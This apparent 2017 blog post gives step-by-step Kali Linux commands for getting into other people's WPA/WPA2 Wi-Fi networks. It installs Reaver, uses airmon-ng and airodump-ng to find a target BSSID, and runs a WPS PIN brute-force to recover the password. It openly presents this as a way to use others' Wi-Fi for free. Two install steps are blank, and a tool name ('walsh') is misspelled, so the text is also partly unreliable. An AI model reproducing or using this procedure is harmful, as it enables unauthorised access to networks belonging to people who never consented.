Sunday, 31 December 2017

How To Crack Wifi Password Using Kali Linux

In this blog, I am going to teach you about how to crack wifi password (WPA And WPA2) using Kali Linux. By this trick, you easily use free wifi of others. So let's start the work:-

How To Crack Wifi Password Using Kali Linux

***  Steps to Crack Wifi Password  ***

* Step 1:-

 1   Open the terminal and then type

      sudo -s

      and then type your password.
 2   Now, download Reaver And Place in a specified folder.
 3   Again, open the Terminal and type

tar xvfz reaver-1.4.tar.gz

 4   Now, Install dependencies

sudo apt-get install libpcap-dev

       then type,

sudo apt-get install libsqlite3-dev

  Note: libpcap and libsqlite3 maybe included in your Ubuntu version but they are very important.
 5   Now, Enter the folder by typing the following command -

cd reaver-1.4/src

 6   Then, type


 7   Again, Type


 8    Finally, Type

make install

    Note: To test if Reaver has been successfully installed or not, Just open the Terminal and then type          ‘reaver’ and finally hit enter, it should give you all the list of Reaver’s subcommands.

* Step 2:-

After above steps of installing Reaver 1.4 completed, now it’s time to hacking the wireless passwords that uses WPA/WPA2 Encryption.

* Requirements:
Installation of aircrack-ng by typing

sudo apt-get install aircrack-ng

** Airodump-ng / Airmon-ng commands **
Reaver 1.4 (Install in Step 1)
 1   Now, We just need to have the wireless BSSID (Mac address) so we use airodump-ng. Then,               open the terminal and type :

  airmon-ng start wlan0

     Now, type

 airodump-ng mon0

      By this command, you will get list of all the available wireless passwords, 
       now copy the BSSID of the Access Point ( e.g: 00:11:28:32:49:55 )
 2    Finally, starting the attack:

reaver -i mon0 -b 00:11:28:32:49:55

Now, it will start testing bruteforcing the PIN number of the vulnerability WPS (which we have spoke about it), and it will show you the WPA/WPA2 Password in the end of the Crack.
Note: Now, You can use walsh -i mon0 to scan for vulnerable Access Points.